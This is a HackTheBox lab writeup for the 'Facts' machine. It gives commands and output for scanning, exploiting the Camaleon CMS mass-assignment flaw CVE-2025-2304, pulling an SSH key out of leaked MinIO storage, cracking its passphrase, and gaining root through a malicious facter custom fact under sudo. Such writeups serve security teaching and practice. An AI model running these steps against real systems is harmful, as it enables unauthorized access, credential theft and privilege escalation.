Share 
## https://sploitus.com/exploit?id=01E82C1C-4154-5D5C-9167-7FD9593B9E23
# HackTheBox โ€” Facts Machine Writeup

![HackTheBox](https://img.shields.io/badge/HackTheBox-Facts-brightgreen?style=for-the-badge&logo=hackthebox)
![Difficulty](https://img.shields.io/badge/Difficulty-Easy-green?style=for-the-badge)
![OS](https://img.shields.io/badge/OS-Linux-blue?style=for-the-badge&logo=linux)

## Machine Info

| Field       | Details          |
|-------------|------------------|
| Name        | Facts            |
| OS          | Linux            |
| Difficulty  | Easy             |
| Release     | Season 10        |
| Retired     | No               |

---

## Attack Chain Overview

```
Recon โ†’ Web Enumeration โ†’ CVE-2025-2304 (Mass Assignment) โ†’ S3/MinIO Credential Leak โ†’ SSH Key Extraction โ†’ Passphrase Cracking โ†’ User Shell โ†’ facter Sudo Abuse โ†’ Root
```

---

## Tools Used

| Tool | Purpose |
|------|---------|
| Nmap | Port scanning & service detection |
| Feroxbuster | Web directory enumeration |
| CVE-2025-2304 PoC | Camaleon CMS privilege escalation |
| boto3 (Python) | MinIO/S3 enumeration & file download |
| ssh2john | Convert SSH key to crackable hash |
| John the Ripper | Crack SSH key passphrase |
| facter | Privilege escalation via sudo misconfiguration |

---

## Reconnaissance

### Port Scan

```bash
sudo nmap -p- --min-rate 5000 -T4  -oN ports.nmap
sudo nmap -sV -sC -p 22,80,54321 
```

**Results:**

```
22/tcp    open  ssh     OpenSSH 9.9p1 Ubuntu
80/tcp    open  http    nginx 1.26.3 (Camaleon CMS)
54321/tcp open  http    MinIO S3 Server
```

```bash
echo " facts.htb" | sudo tee -a /etc/hosts
```

---

## Web Enumeration

```bash
feroxbuster -u http://facts.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 40
curl -s http://facts.htb/robots.txt
curl -s http://facts.htb/sitemap.xml
```

**Key findings:**
- CMS identified: **Camaleon CMS 2.9.0**
- Admin panel: `http://facts.htb/admin/login`
- Registration page: `http://facts.htb/admin/register`

---

## Initial Access

### Step 1 โ€” Register an Account

Visit `http://facts.htb/admin/register` and create an account. Note there is a captcha โ€” register via browser.

### Step 2 โ€” CVE-2025-2304 (Mass Assignment Privilege Escalation)

The `updated_ajax` endpoint uses `permit!` allowing all parameters including `role` to be updated.

```bash
git clone https://github.com/Alien0ne/CVE-2025-2304
cd CVE-2025-2304
python3 exploit.py -u http://facts.htb -U  -P  -e
```

**Output:**
```
[+] Login confirmed
    Current User Role: client
[+] Updated User Role: admin
[+] Extracting S3 Credentials
    s3 access key: AKIAA5CA83CCFE35CD69
    s3 secret key: zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n
    s3 endpoint:   http://localhost:54321
```

---

## Cloud Enumeration โ€” MinIO S3

Port 54321 runs a MinIO S3-compatible server. Using the leaked credentials:

```python
import boto3
from botocore.client import Config

s3 = boto3.client(
    's3',
    endpoint_url='http://facts.htb:54321',
    aws_access_key_id='AKIAA5CA83CCFE35CD69',
    aws_secret_access_key='zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n',
    config=Config(signature_version='s3v4'),
    region_name='us-east-1'
)

paginator = s3.get_paginator('list_objects_v2')
for page in paginator.paginate(Bucket='internal'):
    for o in page.get('Contents', []):
        if 'info-etags' not in o['Key']:
            print(o['Key'])
            s3.download_file('internal', o['Key'], '/tmp/' + o['Key'].replace('/', '_'))
```

**Key files found:**
```
.ssh/authorized_keys
.ssh/id_ed25519        โ† SSH private key
.profile
.bashrc
```

---

## SSH Key Cracking

```bash
chmod 600 /tmp/.ssh_id_ed25519
ssh2john /tmp/.ssh_id_ed25519 > ssh.hash
john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt
```

**Cracked passphrase:** `dragonballz`

---

## User Shell

```bash
ssh -i /tmp/.ssh_id_ed25519 trivia@facts.htb
# Enter passphrase: dragonballz
```

```bash
cat /home/william/user.txt
```

---

## Privilege Escalation

### Enumeration

```bash
sudo -l
```

```
(ALL) NOPASSWD: /usr/bin/facter
```

### Exploitation โ€” facter Custom Fact (Ruby Code Execution)

Facter loads custom facts as Ruby scripts. Since we can run it as root with no password, we inject arbitrary Ruby code:

```bash
mkdir -p /tmp/facts
cat > /tmp/facts/pwn.rb << 'EOF'
Facter.add(:pwn) do
  setcode do
    exec("/bin/bash -p")
  end
end
EOF

sudo facter --custom-dir=/tmp/facts pwn
```

**Root shell obtained!**

```bash
whoami   # root
cat /root/root.txt
```

---

## Key Takeaways

- **Mass assignment** vulnerabilities allow privilege escalation when input is not properly filtered
- **Misconfigured S3/MinIO** buckets can expose sensitive files including SSH private keys
- **Weak passphrases** on SSH keys can be cracked with common wordlists like rockyou
- **NOPASSWD sudo** binaries must always be investigated for abuse potential
- **Chaining small misconfigurations** can lead to full system compromise

---

## References

- [CVE-2025-2304 โ€” Camaleon CMS Mass Assignment](https://nvd.nist.gov/vuln/detail/CVE-2025-2304)
- [GTFOBins โ€” facter](https://gtfobins.github.io/)
- [HackTheBox](https://www.hackthebox.com)

---

*This writeup is for educational purposes only. Always perform security testing on systems you own or have explicit permission to test.*